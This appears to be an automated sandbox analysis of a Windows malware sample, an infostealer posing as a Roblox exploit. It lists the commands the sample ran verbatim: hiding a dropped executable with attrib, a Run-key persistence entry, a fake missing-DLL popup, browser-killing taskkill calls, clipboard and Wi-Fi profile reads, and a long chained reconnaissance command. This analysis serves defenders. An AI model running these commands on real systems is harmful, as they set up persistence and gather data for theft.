pid Process 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 1676 msedge.exe 1676 msedge.exe 1676 msedge.exe 1676 msedge.exe 1676 msedge.exe 1676 msedge.exe 1676 msedge.exe 1676 msedge.exe 1676 msedge.exe 1676 msedge.exe 1676 msedge.exe 1676 msedge.exe 1676 msedge.exe 1676 msedge.exe 1676 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 1460 msedge.exe 5244 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 3112 WMIC.exe Token: SeSecurityPrivilege 3112 WMIC.exe Token: SeTakeOwnershipPrivilege 3112 WMIC.exe Token: SeLoadDriverPrivilege 3112 WMIC.exe Token: SeSystemProfilePrivilege 3112 WMIC.exe Token: SeSystemtimePrivilege 3112 WMIC.exe Token: SeProfSingleProcessPrivilege 3112 WMIC.exe Token: SeIncBasePriorityPrivilege 3112 WMIC.exe Token: SeCreatePagefilePrivilege 3112 WMIC.exe Token: SeBackupPrivilege 3112 WMIC.exe Token: SeRestorePrivilege 3112 WMIC.exe Token: SeShutdownPrivilege 3112 WMIC.exe Token: SeDebugPrivilege 3112 WMIC.exe Token: SeSystemEnvironmentPrivilege 3112 WMIC.exe Token: SeRemoteShutdownPrivilege 3112 WMIC.exe Token: SeUndockPrivilege 3112 WMIC.exe Token: SeManageVolumePrivilege 3112 WMIC.exe Token: 33 3112 WMIC.exe Token: 34 3112 WMIC.exe Token: 35 3112 WMIC.exe Token: 36 3112 WMIC.exe Token: SeIncreaseQuotaPrivilege 3748 WMIC.exe Token: SeSecurityPrivilege 3748 WMIC.exe Token: SeTakeOwnershipPrivilege 3748 WMIC.exe Token: SeLoadDriverPrivilege 3748 WMIC.exe Token: SeSystemProfilePrivilege 3748 WMIC.exe Token: SeSystemtimePrivilege 3748 WMIC.exe Token: SeProfSingleProcessPrivilege 3748 WMIC.exe Token: SeIncBasePriorityPrivilege 3748 WMIC.exe Token: SeCreatePagefilePrivilege 3748 WMIC.exe Token: SeBackupPrivilege 3748 WMIC.exe Token: SeRestorePrivilege 3748 WMIC.exe Token: SeShutdownPrivilege 3748 WMIC.exe Token: SeDebugPrivilege 3748 WMIC.exe Token: SeSystemEnvironmentPrivilege 3748 WMIC.exe Token: SeRemoteShutdownPrivilege 3748 WMIC.exe Token: SeUndockPrivilege 3748 WMIC.exe Token: SeManageVolumePrivilege 3748 WMIC.exe Token: 33 3748 WMIC.exe Token: 34 3748 WMIC.exe Token: 35 3748 WMIC.exe Token: 36 3748 WMIC.exe Token: SeDebugPrivilege 568 tasklist.exe Token: SeIncreaseQuotaPrivilege 3748 WMIC.exe Token: SeSecurityPrivilege 3748 WMIC.exe Token: SeTakeOwnershipPrivilege 3748 WMIC.exe Token: SeLoadDriverPrivilege 3748 WMIC.exe Token: SeSystemProfilePrivilege 3748 WMIC.exe Token: SeSystemtimePrivilege 3748 WMIC.exe Token: SeProfSingleProcessPrivilege 3748 WMIC.exe Token: SeIncBasePriorityPrivilege 3748 WMIC.exe Token: SeCreatePagefilePrivilege 3748 WMIC.exe Token: SeBackupPrivilege 3748 WMIC.exe Token: SeRestorePrivilege 3748 WMIC.exe Token: SeShutdownPrivilege 3748 WMIC.exe Token: SeDebugPrivilege 3748 WMIC.exe Token: SeSystemEnvironmentPrivilege 3748 WMIC.exe Token: SeRemoteShutdownPrivilege 3748 WMIC.exe Token: SeUndockPrivilege 3748 WMIC.exe Token: SeManageVolumePrivilege 3748 WMIC.exe Token: 33 3748 WMIC.exe Token: 34 3748 WMIC.exe Token: 35 3748 WMIC.exe Token: 36 3748 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 1676 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe 2140 msedge.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 3244 msedge.exe 2140 msedge.exe 2140 msedge.exe 772 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe 4628 PCRepair.exe -
Suspicious use of SetWindowsHookEx 30 IoCs
pid Process 772 PCRepair.exe 4628 PCRepair.exe 3200 EXCEL.EXE 3200 EXCEL.EXE 3200 EXCEL.EXE 3200 EXCEL.EXE 3200 EXCEL.EXE 3200 EXCEL.EXE 3200 EXCEL.EXE 3200 EXCEL.EXE 3200 EXCEL.EXE 3200 EXCEL.EXE 3200 EXCEL.EXE 3200 EXCEL.EXE 4300 iexplore.exe 4300 iexplore.exe 3624 IEXPLORE.EXE 3624 IEXPLORE.EXE 4988 4ddig-dll-fixer.exe 3364 4ddigdllfixer_4ddignet_1.0.3.exe 1168 4ddigdllfixer_4ddignet_1.0.3.tmp 2144 NetFrameCheck.exe 2144 NetFrameCheck.exe 4348 Monitor.exe 5332 iexplore.exe 5332 iexplore.exe 4956 IEXPLORE.EXE 4956 IEXPLORE.EXE 5032 LogonUI.exe 5032 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3244 wrote to memory of 3960 3244 msedge.exe 81 PID 3244 wrote to memory of 3960 3244 msedge.exe 81 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4088 3244 msedge.exe 82 PID 3244 wrote to memory of 4508 3244 msedge.exe 83 PID 3244 wrote to memory of 4508 3244 msedge.exe 83 PID 3244 wrote to memory of 4916 3244 msedge.exe 84 PID 3244 wrote to memory of 4916 3244 msedge.exe 84 PID 3244 wrote to memory of 4916 3244 msedge.exe 84 PID 3244 wrote to memory of 4916 3244 msedge.exe 84 PID 3244 wrote to memory of 4916 3244 msedge.exe 84 PID 3244 wrote to memory of 4916 3244 msedge.exe 84 PID 3244 wrote to memory of 4916 3244 msedge.exe 84 PID 3244 wrote to memory of 4916 3244 msedge.exe 84 PID 3244 wrote to memory of 4916 3244 msedge.exe 84 PID 3244 wrote to memory of 4916 3244 msedge.exe 84 PID 3244 wrote to memory of 4916 3244 msedge.exe 84 PID 3244 wrote to memory of 4916 3244 msedge.exe 84 PID 3244 wrote to memory of 4916 3244 msedge.exe 84 PID 3244 wrote to memory of 4916 3244 msedge.exe 84 PID 3244 wrote to memory of 4916 3244 msedge.exe 84 PID 3244 wrote to memory of 4916 3244 msedge.exe 84 PID 3244 wrote to memory of 4916 3244 msedge.exe 84 PID 3244 wrote to memory of 4916 3244 msedge.exe 84 PID 3244 wrote to memory of 4916 3244 msedge.exe 84 PID 3244 wrote to memory of 4916 3244 msedge.exe 84 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4892 attrib.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/2k6k/Exter-Roblox-Exploit-V0.11⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3244 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x108,0x10c,0x110,0xdc,0x114,0x7ffc783b3cb8,0x7ffc783b3cc8,0x7ffc783b3cd82⤵PID:3960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1852,12377881546825208213,14209440874576661188,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1848 /prefetch:22⤵PID:4088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1852,12377881546825208213,14209440874576661188,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:4508
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1852,12377881546825208213,14209440874576661188,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2640 /prefetch:82⤵PID:4916
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,12377881546825208213,14209440874576661188,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:12⤵PID:3124
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,12377881546825208213,14209440874576661188,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:12⤵PID:3056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1852,12377881546825208213,14209440874576661188,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5536 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,12377881546825208213,14209440874576661188,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:12⤵PID:4048
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1852,12377881546825208213,14209440874576661188,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5672 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2348
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1852,12377881546825208213,14209440874576661188,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5104 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:2500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,12377881546825208213,14209440874576661188,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2988 /prefetch:12⤵PID:4868
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,12377881546825208213,14209440874576661188,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2576 /prefetch:12⤵PID:3900
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,12377881546825208213,14209440874576661188,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4620 /prefetch:12⤵PID:2264
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,12377881546825208213,14209440874576661188,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4940 /prefetch:12⤵PID:1816
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4328
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2764
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4440
-
C:\Users\Admin\Desktop\Exter\Exter.exe"C:\Users\Admin\Desktop\Exter\Exter.exe"1⤵PID:5016
-
C:\Users\Admin\Desktop\Exter\Exter.exe"C:\Users\Admin\Desktop\Exter\Exter.exe"2⤵
- Loads dropped DLL
PID:688 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"3⤵PID:1916
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:2488
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:3748
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"3⤵PID:4396
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get Manufacturer4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3112
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "gdb --version"3⤵PID:4864
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"3⤵PID:5112
-
C:\Windows\system32\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:568
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"3⤵PID:4048
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_ComputerSystem get Manufacturer4⤵PID:2100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:3164
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:1976
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"3⤵PID:1524
-
C:\Windows\system32\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
PID:1388
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe""3⤵
- Hide Artifacts: Hidden Files and Directories
PID:3448 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe"4⤵
- Views/modifies file attributes
PID:4892
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe" /f"3⤵PID:552
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe" /f4⤵
- Adds Run key to start application
PID:1200
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""3⤵PID:1392
-
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"4⤵PID:3096
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"3⤵PID:3124
-
C:\Windows\system32\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
PID:396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3244"3⤵PID:3112
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 32444⤵
- Kills process with taskkill
PID:2856
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3960"3⤵PID:1668
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 39604⤵
- Kills process with taskkill
PID:4368
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4088"3⤵PID:936
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 40884⤵
- Kills process with taskkill
PID:5096
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4508"3⤵PID:816
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 45084⤵
- Kills process with taskkill
PID:2732
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4916"3⤵PID:4688
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 49164⤵
- Kills process with taskkill
PID:228
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3056"3⤵PID:1796
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 30564⤵
- Kills process with taskkill
PID:2028
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2264"3⤵PID:1268
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 22644⤵
- Kills process with taskkill
PID:4844
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1816"3⤵PID:3748
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 18164⤵
- Kills process with taskkill
PID:2488
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"3⤵PID:4460
-
C:\Windows\system32\cmd.execmd.exe /c chcp4⤵PID:3568
-
C:\Windows\system32\chcp.comchcp5⤵PID:4860
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"3⤵PID:1168
-
C:\Windows\system32\cmd.execmd.exe /c chcp4⤵PID:4064
-
C:\Windows\system32\chcp.comchcp5⤵PID:648
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:4696
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3172
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"3⤵PID:1412
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Get-Clipboard4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4488
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profiles"3⤵PID:3060
-
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3344
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"3⤵PID:3596
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:2084
-
-
C:\Windows\system32\HOSTNAME.EXEhostname4⤵PID:1816
-
-
C:\Windows\System32\Wbem\WMIC.exewmic logicaldisk get caption,description,providername4⤵
- Collects information from the system
PID:2992
-
-
C:\Windows\system32\net.exenet user4⤵PID:3852
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user5⤵PID:2300
-
-
-
C:\Windows\system32\query.exequery user4⤵PID:816
-
C:\Windows\system32\quser.exe"C:\Windows\system32\quser.exe"5⤵PID:4992
-
-
-
C:\Windows\system32\net.exenet localgroup4⤵PID:3448
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup5⤵PID:2780
-
-
-
C:\Windows\system32\net.exenet localgroup administrators4⤵PID:4140
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators5⤵PID:1632
-
-
-
C:\Windows\system32\net.exenet user guest4⤵PID:276
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user guest5⤵PID:4644
-
-
-
C:\Windows\system32\net.exenet user administrator4⤵PID:3520
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user administrator5⤵PID:2028
-
-
-
C:\Windows\System32\Wbem\WMIC.exewmic startup get caption,command4⤵PID:1796
-
-
C:\Windows\system32\tasklist.exetasklist /svc4⤵
- Enumerates processes with tasklist
PID:5028
-
-
C:\Windows\system32\ipconfig.exeipconfig /all4⤵
- Gathers network information
PID:4348
-
-
C:\Windows\system32\ROUTE.EXEroute print4⤵PID:3648
-
-
C:\Windows\system32\ARP.EXEarp -a4⤵PID:2856
-
-
C:\Windows\system32\NETSTAT.EXEnetstat -ano4⤵
- Gathers network information
PID:3832
-
-
C:\Windows\system32\sc.exesc query type= service state= all4⤵
- Launches sc.exe
PID:2272
-
-
C:\Windows\system32\netsh.exenetsh firewall show state4⤵
- Modifies Windows Firewall
